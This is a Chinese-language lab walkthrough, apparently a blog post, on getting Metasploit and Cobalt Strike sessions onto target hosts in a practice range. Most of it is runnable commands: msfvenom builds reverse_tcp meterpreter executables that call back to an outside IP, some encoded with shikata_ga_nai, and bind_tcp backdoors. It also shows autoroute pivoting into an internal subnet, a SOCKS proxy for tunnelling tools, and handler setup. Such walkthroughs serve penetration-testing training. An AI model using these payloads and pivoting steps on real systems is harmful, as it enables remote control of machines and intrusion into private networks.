靶场搭建
文章内容展示cs完整上线过程,msf思路等同
#网络通讯-MSF&CS-路由添加&节点建立 #控制上线-MSF&CS-协议生成&正反连接 代理协议: SOCKS4/5 代理软件: SocksCap Proxifier ProxyChains等 靶场环境搭建描述:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.xx.xx LPORT=7777 -f exe > msf_7777.exe
忽略细节,将msf_7777放置windows 7上,直接上线 注意:实验之前查看靶机操作系统是否是64位,否则使用msf生成x84架构的木马
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=47.94.xx.xx LPORT=7777 -b"\x00" -e x86/shikata_ga_nai -f exe > msfx86_7777.exe
建议使用64位,以免出现其他错误,当然64位操作系统兼容32位程序
ipconfig查看是否有内网
查看路由信息
run autoroute -p
自动添加路由
run post/multi/manage/autoroute
或者手动添加指定路由,1是接收的session编号
route add 192.168.1![在这里插入图片描述](https://img-blog.csdnimg.cn/50eb5ffb00ca41efb8f7eea5e80bdce9.png)
0.0 255.255.255.0 1
bg 退出该会话 route print 查看已有路由信息
到目前,只有msf可以通讯靶机内网,因为建立了路由,那么内网中其他靶机资产如何使用windows下渗透测试工具进行测试呢? 使用代理工具 先将msf代理流量转发至本地1234端口,然后使用代理工具连接该端口,进行流量转发
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1234
run
启用代理软件配置Sock5代理
msf 内网流量转发代理
命令:socks port 操作:代理转发-Socks代理
cs 内网流量转发代理
这里忽略从windows 7 通过scan获得其他内网主机ip,以及通过win 10开放的服务进行渗透(横向移动),默认通过其他操作将正向连接后门上传到win 10上。视频演示为如何正常上线msf&cs
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > msf_127bd_3333.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.10.xx
set lport 3333
run
监听器:bind_tcp port 命令:connect ip port
cs二层内网主机正向连接上线
MSF控制上线-正向连接
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4455 -f exe > bd2.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.10.xx
set lport 4455
run
监听器:bind_tcp port 命令:connect ip port 效果图: